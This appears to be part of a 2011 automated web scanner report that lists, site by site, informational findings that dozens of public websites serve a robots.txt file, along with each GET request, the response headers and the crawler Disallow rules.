Disallow: /petsideblog/dogs/
Disallow: /petsideblog/petside_items/
Disallow: /petsideblog/cuddle_champion/
D
...[SNIP]...
24.650. http://www.petsmart.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.petsmart.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.petsmart.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:50:32 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Fri, 14 Aug 2009 08:45:06 GMT
ETag: "53c0d0-15b-4711611a3a880"
Accept-Ranges: bytes
Content-Length: 347
Cache-Control: max-age=172800
Expires: Mon, 04 Apr 2011 13:50:32 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /search/
Disallow: /cart/
Disallow: /coreg/
Disallow: /checkout/
Disallow: /compare/
Disallow: /history/
Disallow: /include/
Disallow: /pop_ups/
Disallow: /cgi-bin/
Disallow: /
...[SNIP]...
24.651. http://www.pga.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pga.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pga.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:51:45 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 3225
Content-Type: text/plain
Cache-Control: max-age=120
Expires: Sat, 02 Apr 2011 13:53:45 GMT
Connection: close

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...
24.652. http://www.pgatour.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pgatour.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pgatour.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:26:41 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 142
Content-Type: text/plain
Connection: close

User-Agent: *
Disallow: /.dev
Disallow: /.element
Disallow: /microsites
Disallow: /live-video/demo
Disallow: /pgatour_adspaces
Disallow: /tmp
24.653. http://www.philly.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.philly.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.philly.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=3600
Content-Type: text/plain;charset=utf-8
Date: Sat, 02 Apr 2011 13:36:16 GMT
Expires: Sat, 02 Apr 2011 14:36:16 GMT
Last-Modified: Mon, 28 Mar 2011 04:22:38 GMT
Server: ECS (dca/5339)
Via: 1.0 sj-c14-r1-u12:3128 (squid)
X-Cache: HIT
X-Server-Name: sj-c14-r1-u20
Content-Length: 124
Connection: close

User-agent: *
Sitemap: http://www.philly.com/sitemap.xml
Disallow: /philly/search/
Disallow: /s/
Disallow: /templates/
24.654. http://www.phoenix.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.phoenix.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.phoenix.edu

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:57 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 31 Mar 2011 21:50:16 GMT
ETag: "11f4-4759f600"
Accept-Ranges: bytes
Content-Length: 4596
Connection: close
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding

###
# robots.txt file created on 02/06/2007
# For domain: http://phoenix.edu
###

User-agent: *
Disallow: /info/
Disallow: /properties/
Disallow: /references/
Disallow: /app_data/
Disallow:
...[SNIP]...
24.655. http://www.pickyourown.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pickyourown.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pickyourown.org

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:04:12 GMT
Server: Apache/1.3.42 (Unix) mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Sat, 24 Nov 2007 15:48:37 GMT
ETag: "6e05b2-1e-474847d5"
Accept-Ranges: bytes
Content-Length: 30
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /pdfs/
24.656. http://www.picnik.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.picnik.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.picnik.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:30:34 GMT
Server: Apache/2.2.4
Last-Modified: Tue, 01 Feb 2011 19:40:37 GMT
ETag: "2f-b4e41740"
Accept-Ranges: bytes
Content-Length: 47
P3P: CP="NOI DSP COR CUR ADM DEV OUR BUS UNI"
X-Picnik-Info: h=w72.sea.picnik.com t=1301751034631409 D=143
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /auth/picnik/loginguest
24.657. http://www.picsearch.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.picsearch.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.picsearch.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:19:04 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.7 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
Last-Modified: Fri, 22 Oct 2010 10:47:55 GMT
ETag: "20147ad1-d3-493325ffe6cc0"
Accept-Ranges: bytes
Content-Length: 211
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google*
Disallow:

User-agent: Browsershots
Disallow:

User-agent: *
Disallow: /index.cgi
Disallow: /imageDetail.cgi
Disallow: /textSearch.cgi
Disallow: /search.cgi
Disallow:
...[SNIP]...
24.658. http://www.pillsbury.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pillsbury.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pillsbury.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sun, 29 Aug 2010 04:14:12 GMT
Accept-Ranges: bytes
ETag: "5556fca23047cb1:0"
Server: Microsoft-IIS/7.0
Content-Length: 382
Date: Sat, 02 Apr 2011 14:13:52 GMT
Connection: close

...# robots.txt for http://www.pillsbury.com

User-agent: *
Disallow: /Register
Disallow: /AALL
Disallow: /loginpop
Disallow: /login
Disallow: /Terms-Of-Use
Disallow: /Community-Agreement
Dis
...[SNIP]...
24.659. http://www.pipl.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pipl.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pipl.com

Response

HTTP/1.1 200 OK
Content-Length: 361
Content-Type: text/plain
Last-Modified: Tue, 20 Apr 2010 22:58:08 GMT
Accept-Ranges: bytes
ETag: "bcd3daf1dce0ca1:1d1d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:42:37 GMT
Connection: close

User-agent: *
Disallow: /autocomplete/
Disallow: /bsearch/
Disallow: /cache/
Disallow: /errors/
Disallow: /highlight/
Disallow: /opensearch/
Disallow: /results/
Disallow: /rd/
Disallow: /sear
...[SNIP]...
24.660. http://www.pittsburghlive.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pittsburghlive.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pittsburghlive.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:10:01 GMT
Server: Apache/2.2.3 (Red Hat) PHP/5.1.6
Last-Modified: Fri, 24 Sep 2010 19:38:56 GMT
Accept-Ranges: bytes
Content-Length: 566
Vary: Accept-Encoding,User-agent
Connection: close
Content-Type: text/plain

User-agent: yahoo-newscrawler # Yahoo news
User-Agent: YahooSeeker # Yahoo
User-Agent: ArchitextSpider # Excite
User-Agent: Ask Jeeves
User-Agent: FAST-WebCrawler
User-Agent: Googlebot
User-Agent: M
...[SNIP]...
24.661. http://www.playdom.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.playdom.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.playdom.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 13:41:54 GMT
Content-Type: text/plain
Content-Length: 297
Last-Modified: Fri, 01 Apr 2011 23:30:22 GMT
Connection: close
Expires: Sun, 03 Apr 2011 13:41:54 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes

User-agent: *
Disallow: /css/
Disallow: /files/
Disallow: /flash/
Disallow: /images/
Disallow: /js/
Disallow: /php/
Disallow: /system/
Disallow: /user_guide/
Disallow: /xml/carousel.xml
Disallow: /xml
...[SNIP]...
24.662. http://www.playfin.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.playfin.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.playfin.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:06:52 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 17 Feb 2011 23:46:03 GMT
ETag: "1cf1119-45-49c83001704c0"
Accept-Ranges: bytes
Content-Length: 69
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

# By default, this robots.txt allows all bots
User-agent: *
Disallow:
24.663. http://www.pnc.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pnc.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pnc.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:18 GMT
Last-Modified: Fri, 25 Mar 2011 14:14:15 GMT
ETag: "318632-44-3575fbc0"
Accept-Ranges: bytes
Content-Length: 68
Keep-Alive: timeout=60, max=100
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_q*epuew-w0-mc*80=ffffffffa9c1270145525d5f4f58455e445a4a422973;path=/

User-agent:*Disallow: /error/User-agent: ia_archiverDisallow: /
24.664. http://www.pogo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pogo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pogo.com

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Set-Cookie: prod.JID=BEC7E41A025276592CB3F36D1A2105D2.000016; Domain=.pogo.com; Path=/
Content-Language: en-US
Content-Type: text/plain;charset=ISO-8859-1
Content-Length: 416
Date: Sat, 02 Apr 2011 13:24:41 GMT
Server: Apache-Coyote/1.1
Connection: Keep-Alive


User-agent: *

Disallow: /account/
Disallow: /action/
Disallow: /avatar/
Disallow: /challenge/
Disallow: /error/
Disallow: /favorites/
Disallow: /friends.do
Disallow: /game/help.do
Disallow: /game/
...[SNIP]...
24.665. http://www.pokerstars.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pokerstars.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pokerstars.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:56:56 GMT
Server: Apache
Last-Modified: Fri, 18 Mar 2011 18:10:48 GMT
ETag: "13c-b28a5a00"
Accept-Ranges: bytes
Content-Length: 316
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /it/
Disallow: /sites/
Disallow: /bg/sites/
Disallow: /da/sites/
Disallow: /de/sites/
Disallow: /fi/sites/
Disallow: /fr/sites/
Disallow: /hu/sites/
Disallow: /nl/sites/
Disall
...[SNIP]...
24.666. http://www.politico.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.politico.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.politico.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.6 (Fedora)
Last-Modified: Tue, 18 Nov 2008 21:19:00 GMT
ETag: "d2cc08-158-3e7bd900"
Content-Type: text/plain
Cache-Control: max-age=300
Expires: Sat, 02 Apr 2011 13:31:55 GMT
Date: Sat, 02 Apr 2011 13:26:55 GMT
Content-Length: 344
Connection: close

Sitemap: http://www.politico.com/sitemap_index.xml
Sitemap: http://www.politico.com/sitemap_googlenews.xml
Sitemap: http://www.politico.com/sitemap_news.xml
User-agent: *
Disallow: /2step
Disallo
...[SNIP]...
24.667. http://www.politicsdaily.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.politicsdaily.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.politicsdaily.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:07:08 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 157
Keep-Alive: timeout=5, max=999916
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow: /forward/
Disallow: /mm_track/
Disallow: /omni_track/
Disallow: /search/
Sitemap: http://www.politicsdaily.com/sitemap_index.xml
24.668. http://www.pollmonkey.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pollmonkey.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pollmonkey.com

Response

HTTP/1.1 200 OK
Content-Length: 62
Content-Type: text/plain
Last-Modified: Fri, 15 Jul 2005 04:29:04 GMT
Accept-Ranges: bytes
ETag: "0a842bbf588c51:56a"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:53:04 GMT
Connection: close
X-Powered-By: Bananas and Rum
X-Monkey-Sign: Invisible Monkeys

# go away
User-agent: *
Disallow: /images
Disallow: /global
24.669. http://www.polyvore.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.polyvore.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.polyvore.com

Response

HTTP/1.1 200 OK
Server: Polyvore Web Server
Date: Sat, 02 Apr 2011 13:41:54 GMT
Content-Type: text/plain; charset=UTF-8
Connection: close
Last-Modified: Fri, 01 Apr 2011 21:25:42 GMT
Accept-Ranges: bytes
Content-Length: 585
Vary: Accept-Encoding

Sitemap: http://www.polyvore.com/siteindex.xml.gz

User-agent: *
Disallow: /cgi/search
Allow: /cgi/shop.browse
Disallow: /cgi/shop
Disallow: /cgi/login
Disallow: /cgi/register
Disallow: /cgi/activity

...[SNIP]...
24.670. http://www.popcap.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.popcap.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.popcap.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Content-Type: text/plain
Cache-Control: max-age=1
Expires: Sat, 02 Apr 2011 13:40:42 GMT
Last-Modified: Wed, 21 Apr 2010 22:48:30 GMT
ETag: "1058f11-5a-4bcf80be"
X-Cacheable: NO: !beresp.cacheable
Content-Length: 90
Date: Sat, 02 Apr 2011 13:40:41 GMT
X-Varnish: 1879751055
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-IP: .72
X-Cache: MISS

User-Agent: *
Disallow: /microsite/blitzpc/

Sitemap: http://www.popcap.com/sitemap.xml
24.671. http://www.poptropica.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.poptropica.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.poptropica.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Cache-Control: max-age=900
Date: Thu, 09 Dec 2010 19:16:35 GMT
Server: TUX/2.0 (Linux)
Content-Length: 78
Accept-Ranges: bytes
Last-Modified: Thu, 18 Nov 2010 18:53:46 GMT

User-agent: *
Disallow: *.swf

Sitemap: http://www.poptropica.com/sitemap.xml
24.672. http://www.popularscreensavers.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.popularscreensavers.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.popularscreensavers.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:45 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28
ETag: W/"113-1301508774000"
Last-Modified: Wed, 30 Mar 2011 18:12:54 GMT
Content-Length: 113
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /dl/firefox_install.jhtml
Disallow: /dl/manual_install.jhtml
Disallow: /dl/error.jhtml
24.673. http://www.potterybarn.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.potterybarn.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.potterybarn.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
ETag: W/"328-1301028802000"
Last-Modified: Fri, 25 Mar 2011 04:53:22 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 328
Expires: Sat, 02 Apr 2011 13:56:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:56:58 GMT
Connection: close
Set-Cookie: PBDPWWW-EC=R4233357277; expires=Sun, 03-Apr-2011 14:02:11 GMT; domain=.potterybarn.com; path=/
Set-Cookie: WSPFY=179ed7406c5f00002a2b974d47af01009d500000; expires=Mon, 1-Jan-2024 00:00:01 GMT; path=/; domain=.potterybarn.com

#
# robots.txt - Pottery Barn http://www.potterybarn.com
# Modified 2009-03-05
#
User-agent: *
Disallow: /account/
Disallow: /checkout/
Disallow: /shoppingcart/
Disallow: /services/
Disallow: /shop_g/
...[SNIP]...
24.674. http://www.pricegong.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pricegong.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pricegong.com

Response

HTTP/1.1 200 OK
Content-Length: 23
Content-Type: text/plain
Last-Modified: Mon, 05 Jan 2009 21:49:01 GMT
Accept-Ranges: bytes
ETag: "fd98ea6b7f6fc91:6801"
Server: Microsoft-IIS/6.0
X-Server-Name: WEB01
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:05:06 GMT
Connection: close

User-Agent: *
Allow: /
24.675. http://www.primarygames.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primarygames.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.primarygames.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:18:41 GMT
Server: Apache/2.2.12 (Unix) mod_ssl/2.2.12 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.10
Last-Modified: Mon, 16 Nov 2009 02:10:39 GMT
ETag: "30b0661-4b-47873840f25c0"
Accept-Ranges: bytes
Content-Length: 75
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /images/
Disallow: /*.swf$
24.676. http://www.prlog.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.prlog.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.prlog.org

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:54:49 GMT
Server: Apache
Set-Cookie: SID=0iveul5e0e12r8b4bf9bf6s0t0; expires=Mon, 02 May 2011 13:54:49 GMT; path=/; domain=prlog.org
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent:*
Crawl-delay:60
Disallow:/report-spam.html
Disallow:/report-abuse.html
Disallow:/share.html
Disallow:/email-friend.html
Disallow:/email-contact.html
Disallow:/email.png
24.677. http://www.progressive.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.progressive.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.progressive.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 02 Apr 2011 13:45:03 GMT
Content-Type: text/plain
Content-Location: http://www.progressive.com/robots.txt
Last-Modified: Thu, 18 Feb 2010 15:30:55 GMT
Accept-Ranges: bytes
ETag: "80a16e5cafb0ca1:ca5"
Server: Microsoft-IIS/6.0
P3P: CP = "CUR ADM DEV TAI PSA PSD IVAo IVDo CONo OUR OTRo IND DSP COR CAO PHY ONL UNI PUR COM FIN NAV INT DEM CNT STA GOV OTC" policyref="http://www.progressive.com/w3c/p3p.xml"
X-Powered-By: ASP.NET
Set-Cookie: SITESERVER=ID=a7b1eb5f83824ffcaa210e5e6b09d47e; path=/; domain=.progressive.com; expires=Sun, 31 Dec 2034 00:00:00 GMT
Set-Cookie: TLTSID=40B4DBAF49BEAD99184336AE545FEDA8; Domain=.progressive.com; path=/
Set-Cookie: TLTHID=40B4DBAF49BEAD99184336AE545FEDA8; Domain=.progressive.com; path=/
Set-Cookie: TLTUID=40B4DBAF49BEAD99184336AE545FEDA8; Domain=.progressive.com; path=/; expires=Sat, 02-04-2021 13:45:03 GMT
Content-Length: 432

User-agent:*
Disallow:/*?PrintFlag=Y$
Disallow:/insurance/
Disallow:/copyright.aspx$
Disallow:/privacy.aspx$
Disallow:/email-fraud.aspx$
Disallow:/protect-id.aspx$
Disallow:/site-security.aspx$
...[SNIP]...
24.678. http://www.pronto.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pronto.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pronto.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:23:44 GMT
Server: Apache/2.2.4 (Fedora)
ETag: W/"235-1264110230000"
Last-Modified: Thu, 21 Jan 2010 21:43:50 GMT
Content-Length: 235
Content-Type: text/plain;charset=UTF-8
Set-Cookie: JSESSIONID=72E1100BAF08A5EF48E11BC7536E560C; Path=/
Set-Cookie: SESSIONID=-1477749844; Path=/
Set-Cookie: abt=ProntoV3_5_7-1.185-cellNum_2; Expires=Mon, 02-May-2011 13:23:44 GMT; Path=/
Set-Cookie: M_ID=61cadb32-12f16513672-11f3; Expires=Mon, 01-Apr-2013 13:23:44 GMT; Path=/
Set-Cookie: V_ID=61cadb32-12f16513672-11f4; Path=/
_eep-Alive: timeout=15
_onnection: Keep-Alive
Via: CN-5000
Connection: close

User-agent: Sosospider
Disallow: /

User-agent: *
Disallow: /user/
Disallow: /client/
Disallow: /account/
Disallow: /images/
Disallow: /js/
Disallow: /css-global/
Disallow: /css-local/

Sitemap: http:
...[SNIP]...
24.679. http://www.psu.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.psu.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.psu.edu

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:04:02 GMT
Server: Apache/1.3.37 (Unix)
Last-Modified: Tue, 04 Mar 2003 19:00:12 GMT
ETag: "1918-be-3e64f7bc"
Accept-Ranges: bytes
Content-Length: 190
Connection: close
Content-Type: text/plain

# Added 09/19/2000
User-agent: *
Disallow: /dept/nat/lifeguard/
Disallow: /ur/test/
# Added 03/04/2003
Disallow: /bulletins/bluebook/courses.old/
Disallow: /bulletins/whitebook/courses.old/
24.680. http://www.publicrecords.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.publicrecords.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.publicrecords.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:55 GMT
Server: Microsoft-IIS/7.5
Content-Type: text/plain
Last-Modified: Wed, 08 Dec 2010 01:00:35 GMT
Accept-Ranges: bytes
ETag: "30b33c527396cb1:0"
X-Powered-By: ASP.NET
Content-Length: 87
Vary: Accept-Encoding
Connection: close

# Robots.txt for www.PublicRecords.com

User-agent: *
Disallow: /search-results-link
24.681. http://www.purdue.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.purdue.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.purdue.edu

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:00:36 GMT
Server: IBM_HTTP_Server
Last-Modified: Wed, 17 May 2006 15:12:33 GMT
ETag: "e8251-b6-59515a40"
Accept-Ranges: bytes
Content-Length: 182
Connection: close
Content-Type: text/plain
Set-Cookie: BIGipServerPool_old-PPWC_all=1713023168.0.0000; path=/

User-agent: *
Disallow: /~
Disallow: /wai/pdf/

User-agent: Googlebot
Disallow: /wai

User-agent: Slurp
Disallow: /wai

User-agent: *
Disallow: /bscompt/Projects/AribaUpgrade


24.682. http://www.purplemath.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.purplemath.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.purplemath.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:19:30 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
Last-Modified: Mon, 03 Dec 2007 21:20:05 GMT
ETag: "1fd64-591-44068596dff00"
Accept-Ranges: bytes
Content-Length: 1425
Connection: close
Content-Type: text/plain

User-agent: Googlebot-Image
Disallow: /

User-agent: Yahoo-MMAudVid
Disallow: /

User-agent: Yahoo-MMCrawler
Disallow: /

User-agent: psbot
Disallow: /

User-agent: Fasterfox
Disallow: /

User-agent:
...[SNIP]...
24.683. http://www.qualityhealth.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.qualityhealth.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.qualityhealth.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 02 Feb 2011 19:19:43 GMT
ETag: "5b-49b5187fcf1c0"
P3P: policyref="http://www.qualityhealth.com/p3p/p3p.xml", CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: text/plain; charset=ISO-8859-1
Cache-Control: max-age=3600
Date: Sat, 02 Apr 2011 13:51:41 GMT
Content-Length: 91
Connection: close
Set-Cookie: AKAMAIID=a4f3f748bb190000ed29974d4ee90c0063ac0000; path=/; domain=www.qualityhealth.com

User-agent: *
Crawl-delay: 5
Disallow: /resources/javascript/
Disallow: /resources/styles/
24.684. http://www.qualtrics.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.qualtrics.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.qualtrics.com

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:56:08 GMT
Server: Apache/2.2.11 (FreeBSD)
X-Pingback: http://www.qualtrics.com/q1/xmlrpc.php
Cache-Control: max-age=315360000
Expires: Tue, 30 Mar 2021 13:56:08 GMT
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
ServerAddr: 192.168.1.8
Content-Length: 24
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:
24.685. http://www.questia.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.questia.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.questia.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:15:38 GMT
Accept-Ranges: bytes
ETag: W/"83-1300281623000"
Last-Modified: Wed, 16 Mar 2011 13:20:23 GMT
